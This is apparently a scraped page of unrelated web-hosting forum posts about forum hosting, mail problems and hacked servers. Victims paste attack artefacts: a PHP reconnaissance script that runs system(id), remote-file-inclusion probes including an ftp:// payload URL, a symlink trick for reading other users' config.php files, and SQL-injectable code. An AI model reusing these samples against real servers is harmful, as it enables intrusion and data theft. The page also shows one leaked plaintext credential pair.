Alot of VB forums have hacking every day
In fact All hackers couldn't hack databases or files
They only edit one template in style like header or forumhome
So Uploading style again resolve the problem
But How can I disallow them to to edit templates
Any functiond to disable or rule for mod_sec ?
I run a small vb forum that is quickly expanding beyond the shared hosting plan we currently have with GoDaddy. So far we have been looking at VPS as a solution that would allow us to grow as we grow.
I hope I'm allowed to ask this, but I am looking for examples of vb forums that have about 100 concurrently logged in members and examples of vb forums with 200 members concurrently logged in and are running on either KnownHost or WiredTree (or an alternative service).
Please provide a link to your forum, the name of the host, and the VPS package you currently have. Finally, please let me know if you are utilizing Litespeed.
I'm hoping this will become a great resource for growing community owners looking to take the next step.
Link:
Provider:
VPS Package:
Over the past 4 years I have had 5 different hosting companies. I run a small forum (400 to 1k page vies per day) and is a nuke forum. It usually runs flawlessly on the new host for 7 to 9 months and then the db bogs down and I switch to a new host and install the complete db again to the days postings and it runs gr8 yet again.
Im no expert but Im no newb either. I have worked for 2 hosting companies (Hostgator & Applied Innovations) and I have my Bachelors in IT. I know enough to be dangerous! Is there anyone who can tell me if there is a host that I can put my little forums on that doesnt charge an arm and a leg and is reliable enough to stay with.
I have seen all the reviews all over the place, but from working at hostgator I know they have their level 2 support people logging in to these types of forums as different people and posting great reviews every day, I dont think they have stopped doing that.
Is there any one who has been with their hosting co for years and have a site like mine that can say that they recommend it?
I am running Apache 2.2 on CentOS. I really want to install mod_security to lock things down. But I saw where there were some issues with mod_security and forums. I plan on having a forum live on my site shortly. I found this bit of info:
If you install mod security on the server, some forums will not work properly as this will compare each pattern which is posted against the rule set and will block it if found matching.
Is anyone using mod_security with a forum currently?
I want to know that my main site smsbucket.com and smsbucket.com/forums are both hosted on same server.
But in future when my forum will grow I will need to switch host because my current hosting provider doesn't provide big disk space so in future can I just host /forums on different server? and keep smsbucket.com on my current server?
Does anyone know if such a thing exists? A Tool to convert a mailing list to a forum like say phpBB or VB?
View 1 Replies View RelatedWhats the best host for hosting a forum for free?
View 1 Replies View RelatedI'm an owner and manager of a server running about a year ago, and everything was fine till three months ago.
Many VBulletin forums hacked from one hacer.
i hired a technical to re-setup security of the server
upgrading for ( OS , php , apache ) done. and other setting...
after that he said every thing is ok now.
3 weeks later , hack back again from another hacker on 3 VBulletin forums
put in your concideration all hacked forums are secured enough and using 3.6.8 patch level 2.
what possible reasons assist the hacker to reach config file?
is this a gab from the server or VB version?
OS : Fedore 5 .. upgraded from Fedora 4
php Version : 5.2.4
Apache Version : 1.3.39
PERL version 5.8.8
some of my user , have problem by sending activate email , from their forums and sites such as Vbulletin and phpnuke
this issue happen since i checked (Prevent the user "nobody" from sending out mail to remote addresses) box in Tweak setting , for preventing Spammers.
Suexec was enabled in my server , but i dont enable PhpSuexec in apache build .
I've been receiving many bounced mail looking like this:
------------------------------------------------------
-----Original Message-----
From: Mail Delivery System [mailto:Mailer-Daemon@swh1.sellwebhost.com]
Sent: December 29, 2007 6:05 AM
To: nobody@swh1.sellwebhost.com
Subject: Mail delivery failed: returning message to sender
This message was created automatically by mail delivery software.
A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:
alakeneex@mail.ru
SMTP error from remote mail server after RCPT TO:<alakeneex@mail.ru>:
host mxs.mail.ru [194.67.23.20]: 550 Access from ip address 72.55.156.210 blocked. Visit http://win.mail.ru/cgi-bin/support_bl?ip=72.55.156.210
------ This is a copy of the message, including all the headers. ------
Return-path: <nobody@swh1.sellwebhost.com>
Received: from nobody by swh1.sellwebhost.com with local (Exim 4.68)
(envelope-from <nobody@swh1.sellwebhost.com>)
id 1J8ZV7-0001oN-QQ
for alakeneex@mail.ru; Sat, 29 Dec 2007 06:05:09 -0500
To: alakeneex@mail.ru
Subject: Welcome to hidden.com Forums
Reply-to: jim@hidden.com
From: jim@hidden.com
Message-ID: <4448804740c38716c8c65ef3203108b3@hidden.com>
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 8bit
Date: Sat, 29 Dec 2007 06:05:09 -0500
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: PHP
X-MimeOLE: Produced By phpBB2
Welcome to hidden.com Forums
Please keep this email for your records. Your account information is as
follows:
----------------------------
Username: enunkkawncuri
Password: jOFwawk954
----------------------------
Please do not forget your password as it has been encrypted in our database and we cannot retrieve it for you. However, should you forget your password you can request a new one which will be activated in the same way as this account.
Thank you for registering.
--
Thanks,
hidden.com
-----------------------------------------------------------
This is only one exemple from one forum but many of our users use forums as well and we receive dozens of similar mails.. Is there a way to stop this or to make the mail rebound to the user instead to nobody?
Staminus Communications has been hosting a botnet forum, which distributes bots, worms, trojans, illegal clickers, and tons more, 95% of the site is illegal, and is forbidden by Staminus's provider yet they could care less as long as they get there money, I sent an abuse letter August 17th 2009, they even admitted things were illegal on the site, I pointed out several like the Google Adsense clicker bot which is highly illegal and which is nothing close to the other content hosted and/or linked to.
They are hosting unkn0wn.ws they refuse to remove the site or make them remove the illegal content which is most of the forum, which now forces me to send a letter to there provider and the cybercrime which I am now doing.
Now I guess they do not care about what they host, only if the person pays, so I guess I'm just going to expose it here for everyone to notice, because it's just going to get there data center raided over time by hosting illegal content and not removing it.
Let's see what you guys think, or what the admins have to say when they read this post.
What do you guys think when a provider does nothing about illegal content do you think it's the employee's that are at fault or the customer?
I have spent several hours on this forum over the past few days doing some research and have officially confused myself. I am a volunteer with a nonprofit organization and our online forums (running on vbulletin) are maxing out the database SQL connections several times per day. The host has a max_user_connections limit of 15 but doesn't have an intermediary step from shared hosting to dedicated hosting. Dedicated hosting is cost-prohibitive and the rest of our site has more than enough room to grow on our current hosting plan (including traffic bandwidth, disk space, etc).
We are planning to register a new domain name for the forums and move them off to another hosting provider. I donate the hosting fees to the organization and I don't have much of a budget to work with ($20/mo or so ideally). I am looking for recommendations for a hosting provider that will support a somewhat busy forum (usually only between 30-50 users online at once but anywhere between 1,000 and 2,500 pageviews per day) and also allow a stepped growth plan (instead of from shared straight to dedicated.)
I've seen Hawk Host, Siteground and URLJet mentioned frequently on posts here and over at vBulletin but I don't want to just jump into a new host and face a similar problem in the future.
Email on server working fine, I can send mails from webmaster@xxx.com to any email only forums like VB don't send emails to hotmail & yahoo ! but emails from forums arrive to emails like webmaster@xxx.com
View 1 Replies View RelatedI'll second what is said about Lunarpages. They are an absmal McHost whose priority is to lure in as many customers as possible without bothering about the quality of their service. I challenge anybody to ring their telephone support line and see if somebody picks it up. I have tried to call ten times in the last six months and never been able to get through once, despite hanging on for ages.
Just today my entire website was down because Lunarpages moved it to a new server (without asking me) and screwed up. The website, Azam.biz has over 17,000 references to it in Google and is critical to my business. I sat drowing in sweat for hours. I couldn't get hold of anybody at Lunarpages by telephone or live chat and the one support response I received ws addressing an unrelated issue.
Worse thing of the lot is Lunarpages censors criticism them on their forums more so than any webhost I have ever know. Every time I post a comment about downtime or not being able to get hold of anybody on the telephone, they delete the post saying it is "incorrect". I have never met a company with such a Stalinesque censorship policy.
I have feared posting anything negative about Lunarpages on other forums because I've been worried about them closing down my account. But, after having suffered so much stress because of them today, I don't care any more.
I am going to back up by entire site now, because I'm worried they will close down my account after reading this. They are not the type of company to take on board criticism and use it to improve their offerings; their obsession is to stifle any criticism.
I am now suffering pain in my heart for the first time in my life because of how badly Lunarpages have treated me today. Their arrogance shows no bounds - they are smug, full of hype and don't give a damn about ruining customers' businesses.
today i have a lot of hacking on my server .
i searched for shell scripts on the server , and i found alot of it :
[root@host svt]# ls -l
total 48
-rw-r--r-- 1 koky koky 6700 May 7 08:14 s.php
lrwxrwxrwx 1 koky koky 48 May 7 08:07 s1 -> /home/user1/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:12 s2 -> /home/user2/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 48 May 7 08:19 s3 -> /home/user3/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 47 May 7 08:37 s5 -> /home/user4/public_html/vb/includes/config.php
lrwxrwxrwx 1 koky koky 49 May 7 08:49 s6 -> /home/user5/public_html/vb/includes/config.php
-rw-r--r-- 1 koky koky 13199 May 7 07:59 ss.php
-rwxr-xr-x 1 koky koky 23005 May 7 07:58 svt.svt
as u can see he uploaded the files on this account "koky" and redirected this files to user1,user2,user3,user4 and user5 accounts .
and he could read the config.php and then hacked the site easly !!
i read befor that the reason of this is Perl on the server , and the way to solve it to edit httpd.conf by adding this in it :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
and then restart the http :
service httpd restart
i did all of that , and when i restarted http it said :
[root@host www]# service httpd restart
Syntax error on line 51 of /usr/local/apache/conf/httpd.conf:
Invalid command 'Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch', perhaps misspelled or defined by a module not included in the server configuration
and all the sites got down !
i deleted :
<Directory "/home">
Options -ExecCGI -FollowSymLinks
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
from httpd.conf and then sites worked correctly .
so you all know my problem now ! and i think alot of you have the same problem , so i wish we all try to find any solution for this and knows the best way to protect pel on the server .
a site i manage for a client is being hacked every couple of days, its not the actual site but the hosts server thats getting attacked, all sites on that server, well actually all thier servers.
They have made no attempt to sort this problem, i report it they look at the site and say "site loads fine for us" which it does.
All index files are having a base64 encode line written after the <body> tag, this adds hundreds of spam links which are hidden with display:none; they also add .html to application types in htaccess for php to run in these files too.
Problem is, i am moving the site to another host but cannot change the nameservers to the new host's untill the client returns from a holiday, so i must keep the site up on the insecure host for now.
I am removing the spam code almost daily, is there anyway i can stop this attack happening for the time being, the host does nothing.
As well all know there has been a hypervm exploit which may have taken down fsckvps and other hosts have been having attacks. If possible install any program that will warn you of a connection to your server and or provide input on what it may or may not be.
I myself Just had a blank php format file uploaded to a clients vps and It tried accessing other vps servers. As far as I know the ip was rapidly changing and untraceable (this may or may not be from the exploit), If anyone else is having hypervm attacks or server attacks please post here so instead of working within our own company's we are working as a group of over 10 thousand+ wht members to solve this issue ourselves.
(mods may move this wherever)
i have a server and these days my server is hacking by the hacker the problem is, chmod 777, there are many dir's with the chmod 777 and hacker is uploading files and creating folders under the folder which is created with chmod 777, now i just want to know how i can block the hacker, and is there any way to allow the scripts which in my server and not allow any other scripts to upload files in my server
i have linux server
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url]
[url]
[url]
[url]
[url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
alot of Databases in my server was hacked
Hacker can edit tables
Are there any any ports in MYSQL4?
see the log entries below:
LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
I keep reading all these devastating posts about people's machines being compromised. Are most of these hacks due to weak passwords of administrators or clients which end up getting bruted, or are there known exploits for cpanel/plesk/apache etc? I am setting up an apache-only server with a really secure password, but I am wondering if it could still be breached using an exploit.
View 14 Replies View RelatedPurely by accident I logged in a few minutes ago onto my server and ran a 'ps -ax'
At the very end I had the following lines:
29803 ? S 0:00 /bin/sh /usr/local/sbin/bfd -s
29804 ? D 0:00 /bin/sh /usr/local/bfd/tlog /var/log/secure sshd.4
29805 ? S 0:00 grep sshd
29807 ? S 0:00 grep -viw error: Bind
29808 ? S 0:00 sed s/::ffff://
29814 ? S 0:00 grep -iw Illegal user
29816 ? S 0:00 grep -iwv Failed password for illegal user
29817 ? S 0:00 grep -iwf /usr/local/bfd/pattern.auth
29818 ? S 0:00 awk {print$10":"$8}
29819 ? S 0:00 grep -E [0-9]+
Is this someone hacking my password file or is this something diffrent?
I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
Is security really that critical? If so, why are some of the largest software companies providing such a bad example for the rest of the industry? Why would someone want to target my website? Why is security often overlooked?
These are all common questions that arise on a daily basis within the online industry.
The rest of this article will provide some detailed answers, along with practical examples and true scenarios.
I've spoken with numerous hackers over the past short while. I can't count the number of times I've heard the line "Ignorant site owners deserve to be hacked". In my opinion, that's like claiming that cars without alarms deserve to be stolen, or homes without alarm systems deserve to be burglarized. It's not just wrong - it's illegal.
Security risks and vulnerabilities affect the entire online industry. When a single website is hacked, there are usually multiple other victims. This is most commonly seen with widely distributed software. A potential attacker has the ability to install the software on a test environment, locate the vulnerabilities, then attack random victims even before anyone else is aware of the potential exploits. Once a vulnerability is located, the attacker simply needs to search for other environments using the same software, and within minutes there are hundreds, often thousands of potential victims.
Typically, in the race to market, software providers are encouraged to release their products as soon as the applications are usable. Critical development procedures are often overlooked or intentionally bypassed. One such miss is an application vulnerability assessment. Although the product may be usable, the effects of a vulnerable application could be severe.
Sadly, nobody is "off limits" when it comes to hacking. Most hackers feel safe committing online crime, since the online industry has evolved much faster than the security industry. Many applications are not created with the intent to recognize hacking attempts. Some hackers view their actions as a competition - Who can attack the most valuable website? Who can exploit the most user databases? In many cases, these attacks are bragged about within the hacker's immediate network. The competitive nature of these hacking groups has become so severe, there have been reports of attacks between competing organizations.
You might ask, "If I use industry standards, won't my environment be secure?". The short answer: no, but it helps. Hackers are not restricted by industry standards. Most security companies only implement new standards once at least one victim is reported. This often gives hackers plenty of time to locate other vulnerable environments, and before long, the number of victims can increase rapidly. Hackers are some of the most innovative individuals within the online industry. The most logical way to combat them is to use similar methodology for security purposes.
that my vbulletin forum redirect to another site
i upgrade to last version but i still have the same error
i have root access and want to know how i can restrict direct to another server
Our VPS is being hit several times a day with hacking attempts. We have been actively monitoring error logs and can see the failed attempts. I was just wondering if there is a better way to track such attempts or another system log that wold provide additional info on these attacks? or maybe some 3rd party logging scripts?
View 13 Replies View Relatedapparently a mod_deflate patch has been available for apache 1.3.37 for some time but since I rely on cpanel as a huge time/knowledge saver, I'd like to hack it into buildapache/easyapache so it's an option just as easy as mod_gzip is (with a simple checkbox)
after poking around I learned that all the magic happens in /home/cpapachebuild/buildapache
I've studied how mod_gzip is activated/installed but some steps are beyond me
mod_deflate for 1.3.37 is here [url]the critical files inside are of course mod_deflate.patch and mod_deflate.c
so I assume stick those files into a directory under buildapache, but where do I hack in the patch and build steps?
One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at
[url]
Will I depend on my hosting account(SSL) in preventing a hacking/spamming case scenario? What do I need to know to prevent hacking/spamming?
View 5 Replies View Related
